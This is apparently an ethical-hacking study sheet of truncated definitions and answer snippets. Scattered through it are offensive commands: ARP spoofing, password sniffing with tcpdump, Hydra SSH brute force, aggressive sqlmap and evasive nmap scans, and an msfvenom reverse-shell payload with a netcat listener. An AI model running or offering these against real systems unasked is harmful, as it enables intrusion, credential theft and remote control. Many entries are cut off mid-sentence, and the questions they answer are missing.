ETHICAL HACKING BASICS

Ethical hacking involves an authorized attempt to gain unauthorized access to a computer system, application, or data. The goal is to identify securit...

The CIA triad is a foundational model for information security: 1. **Confidentiality**: Ensuring that data is accessible only to authorized individual...

- **White Hat**: Ethical hackers who use their skills for defensive purposes with permission. - **Black Hat**: Malicious hackers who violate security ...

Footprinting is the first phase of ethical hacking. It involves gathering as much information as possible about a target network or system to identify...

- **Vulnerability Assessment (VA)**: A passive process of identifying and reporting known vulnerabilities without exploiting them. - **Penetration Tes...

Social engineering is the psychological manipulation of people into performing actions or divulging confidential information. Examples include Phishin...

Phishing is a type of social engineering where an attacker sends fraudulent messages (usually via email) designed to trick a person into revealing sen...

A firewall is a network security device that monitors and filters incoming and outgoing network traffic based on an organization's previously establis...

- **IDS (Intrusion Detection System)**: Monitors network traffic for suspicious activity and alerts defenders. - **IPS (Intrusion Prevention System)**...

Cryptography is the science of securing communication by converting plain text into an unreadable format (ciphertext) using mathematical algorithms an...

- **Symmetric**: Uses the same key for both encryption and decryption (e.g., AES). - **Asymmetric**: Uses a public key for encryption and a private ke...

Hashing is a one-way mathematical function that turns data into a fixed-length string of characters. Unlike encryption, hashing cannot be reversed. It...

- **DoS (Denial of Service)**: An attack aimed at making a system or network resource unavailable to its intended users. - **DDoS (Distributed DoS)**:...

A botnet is a network of hijacked computer devices (bots) that are under the control of a single attacking party (the botmaster or botherder). They ar...

1. **Reconnaissance**: Information gathering. 2. **Scanning**: Identifying open ports and services. 3. **Gaining Access**: Exploiting vulnerabilities....

A brute force attack is a trial-and-error method used by application programs to decode encrypted data, such as passwords or Data Encryption Standard ...

A rootkit is a collection of computer software, typically malicious, designed to enable access to a computer or an area of its software that is not ot...

- **Virus**: Requires a human action to spread (e.g., opening a file) and attaches itself to a program. - **Worm**: A standalone program that can self...

The OSI model consists of 7 layers: Physical, Data Link, Network, Transport, Session, Presentation, and Application. Understanding these layers is cru...

Port scanning is a method used to determine which ports on a network are open and could be receiving or sending data. It's also used to send packets t...

nmap -sS -p 1-65535 <target_ip>

- 21: FTP - 22: SSH - 23: Telnet - 25: SMTP - 53: DNS - 80: HTTP - 443: HTTPS - 3389: RDP

A Virtual Private Network (VPN) creates a secure, encrypted tunnel over the internet between your device and a server. It masks your IP address and en...

PoLP is the practice of limiting access rights for users to the bare minimum permissions they need to perform their job functions. This reduces the ri...

SQLi is a type of vulnerability where an attacker can interfere with the queries that an application makes to its database. It allows attackers to vie...

- **TCP**: Connection-oriented, reliable, ensures packets arrive in order (e.g., HTTP, SSH). - **UDP**: Connectionless, faster but unreliable, no guar...

1. **Planning and Reconnaissance**: Gathering info. 2. **Scanning**: Using tools like Nmap to see open ports. 3. **Gaining Access**: Exploiting vulner...

The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus on the most critical se...

XSS is a vulnerability where an attacker injects malicious scripts into content from otherwise trusted websites. When a user visits the page, the scri...

1. **Stored (Persistent)**: The malicious script is permanently stored on the server (e.g., in a comment field). 2. **Reflected (Non-persistent)**: Th...

CSRF is an attack that forces an authenticated user to execute unwanted actions on a web application in which they're currently authenticated. With a ...

A MitM attack is where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicat...

ARP spoofing is a technique where an attacker sends fake Address Resolution Protocol (ARP) messages onto a local area network to link their MAC addres...

arpspoof -i eth0 -t 192.168.1.5 192.168.1.1

- **Encoding**: Data transformation for compatibility (not for security). - **Encrypting**: Data transformation for confidentiality (reversible with a...

SQLmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws.

sqlmap -u "http://test.com/index.php?id=1" --dbs

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work together to support the entire testin...

- **Bind Shell**: The attacker connects to a listener on the victim's machine (often blocked by firewalls). - **Reverse Shell**: The victim machine co...

Enumeration is the stage where the attacker tries to gain more detailed information about the target. This includes identifying usernames, network res...

Nmap Scripting Engine (NSE) allows users to write simple scripts to automate a wide variety of networking tasks. These scripts can perform vulnerabili...

nmap --script vuln <target>

Salting is the addition of a unique, random string of characters to each password before it is hashed. This makes it much harder for attackers to use ...

A zombie is a computer connected to the internet that has been compromised by a hacker, computer virus, or trojan horse and can be used to perform mal...

Metasploit is the world's most used penetration testing framework. It helps security teams verify vulnerabilities, manage security assessments, and im...

- **False Positive**: A security tool incorrectly identifies a benign activity as a threat. - **False Negative**: A security tool fails to identify a ...

A buffer overflow occurs when a program writes more data to a buffer (a temporary storage area in memory) than it can hold. This can cause the program...

Netcat is a versatile networking utility used for reading from and writing to network connections using TCP or UDP. Often called the 'Swiss Army Knife...

nc -lvp 4444 # Listens for connections on port 4444

Sniffing is the process of monitoring and capturing all data packets passing through a given network using a sniffing tool. Examples of sniffing tools...

SOP is a critical security mechanism in web browsers that restricts how a document or script loaded from one origin can interact with a resource from ...

Mitigation strategies include: 1. **Input Validation**: Ensuring input meets expected formats. 2. **Output Encoding**: Converting characters like `<` ...

This vulnerability occurs when a web application fails to properly enforce restrictions on what authenticated users are allowed to do. For example, a ...

Credential stuffing is a type of cyberattack where an attacker uses a large list of compromised usernames and passwords (from a previous data breach) ...

- **Port Scanning**: Identifies open ports and services running on a target host. - **Vulnerability Scanning**: Identifies specific software security ...

Pivoting is the act of using a compromised system to attack or gather information about other systems on the same internal network that were previousl...

A zero-day vulnerability is a software security flaw that is known to the attacker but unknown to the vendor. The 'zero-day' name refers to the fact t...

Steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video. Unlike cryptography, it hi...

A honeypot is a decoy computer system that is intentionally left vulnerable to hackers. Its purpose is to lure attackers away from real systems, study...

- **Black Box**: The tester has zero knowledge of the internal systems (simulates a real outside attacker). - **White Box**: The tester has full knowl...

Fuzzing (or fuzz testing) is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a comput...

An evil twin is a fraudulent Wi-Fi access point that appears to be legitimate but is set up to eavesdrop on wireless communications. It's the wireless...

Common techniques include: 1. **Scrubbing Centers**: Rerouting traffic through a specialized network to filter out the bad traffic. 2. **Rate Limiting...

DNS tunneling is a method for encoding the data of other programs or protocols in DNS queries and responses. Attackers use it to bypass firewalls and ...

- **Red Team**: Offensive security professionals who simulate real-world attacks to test security defenses. - **Blue Team**: Defensive security profes...

Privilege escalation is the act of exploiting a bug, design flaw, or configuration error in an operating system or software application to gain elevat...

A sandbox is a security mechanism for separating running programs, usually in an effort to mitigate system failures or software vulnerabilities from s...

A WAF is a specific type of firewall that filters, monitors, and blocks HTTP traffic to and from a web application. It differs from a regular firewall...

Reporting is the final and most important phase of a penetration test. It detail the vulnerabilities found, their severity, the evidence of exploitati...

Session hijacking (sometimes known as cookie hijacking) is the exploitation of a valid computer session—sometimes called a session key—to gain unautho...

- **Cryptography**: The message is visible but scrambled/unreadable without a key. - **Steganography**: The message itself is hidden, its very existen...

1. Weak, Guessable, or Hardcoded Passwords. 2. Insecure Network Services. 3. Insecure Ecosystem Interfaces (e.g., cloud, web, mobile API). 4. Lack of ...

An air gap is a network security measure employed on one or more computers to ensure that a secure computer network is physically isolated from unsecu...

Patch management is the process of distributing and applying updates to software. These patches are often necessary to correct security vulnerabilitie...

Packet injection is a computer networking term that refers to the act of an attacker injecting a packet into a network to disrupt communication or tri...

Blind SQLi is a type of SQL Injection where the database does not output any information to the web page. The attacker must use time-delays or boolean...

A bug bounty program is a deal offered by many websites, organizations, and software developers by which individuals can receive recognition and compe...

Computer forensics is the field of technology that uses investigative techniques to identify and preserve evidence from a computer device. It's often ...

Attackers can bypass 2FA using techniques like: Session Cookie theft, SIM Swapping, Real-time Phishing (Proxies), and Social Engineering the help desk...

In the context of security, reverse engineering is used to analyze malware to see what it does, or to analyze software to find hidden vulnerabilities ...

Perform service version detection and then browse the site to identify the technology stack (e.g., CMS, Web Server version) and look for obvious entry...

nmap -sV -p 80 <target>

Use Nmap with the `-O` flag for OS fingerprinting. It analyzes how the target responds to specific TCP/IP packets.

nmap -O <target>

Use Wireshark or Tcpdump for packet capturing. If the traffic is unencrypted (HTTP, FTP, Telnet), you can see credentials in plain text.

tcpdump -i eth0 -A | grep -i "pass"

Use SQLmap with high risk and level parameters for a thorough scan.

sqlmap -u "URL" --batch --risk=3 --level=5

Use Hydra with a username list and a password list.

hydra -L users.txt -P pass.txt <target> ssh

Use Nmap's fragmentation (`-f`), decoy (`-D`), or idle scan (`-sI`) features.

nmap -f -sS <target>

Use directory busting tools like Gobuster or Dirb with a wordlist.

gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt

Use John the Ripper or Hashcat. Hashcat is generally faster as it uses GPU acceleration.

hashcat -m 0 -a 0 <hash_file> <wordlist>

Use MSFvenom (part of Metasploit) to create an executable with a reverse shell.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f exe > shell.exe

Use the Metasploit multi-handler or Netcat.

nc -lvnp 4444

Steganography. Use tools like `steghide` to extract hidden data from image or audio files.

steghide extract -sf suspicious.jpg

Use WPScan to identify vulnerable plugins, themes, and outdated core versions.

wpscan --url http://example.com --enumerate vp,vt,u

Use the `dig` command with the `axfr` type. If successful, it reveals all records for the domain.

dig @<nameserver> <domain> axfr

Use tools like Sublist3r, Amass, or online search engines specialized in subdomain discovery.

sublist3r -d example.com

Shodan is a search engine for internet-connected devices. It allows hackers to find vulnerable servers, IoT devices, and industrial control systems ba...

Use online tools like securityheaders.com or command-line tools like `curl` to inspect the response headers.

curl -I https://example.com

Critical risk. An attacker can use tools like `git-dumper` to download the entire repository, including source code, credentials, and history.

Use specialized vulnerability scanners or Nmap scripts designed to trigger the JNDI lookup and detect the response.

Use advanced Google search operators like `filetype:pdf` and `intitle:"index of"`.

site:example.com filetype:log

Look for configuration files, backup databases, SSH keys, browse browser history, and attempt privilege escalation to gain root/SYSTEM access.

Use browser extensions like Wappalyzer or BuiltWith, or check the source code for unique file paths (e.g., `wp-content` for WordPress).

Manually change ID parameters in the URL or request body (e.g., change `user_id=101` to `user_id=102`) to see if you can access other users' data.

Use services like 'Have I Been Pwned' (HIBP) which aggregate data from thousands of breaches.

Could be a scheduled DDoS attack, a resource-heavy cron job, or a performance-bottleneck vulnerability (like ReDoS) being exploited.

Document the finding clearly, report it to the owner through proper channels (Responsible Disclosure), give them time to fix it, and offer assistance ...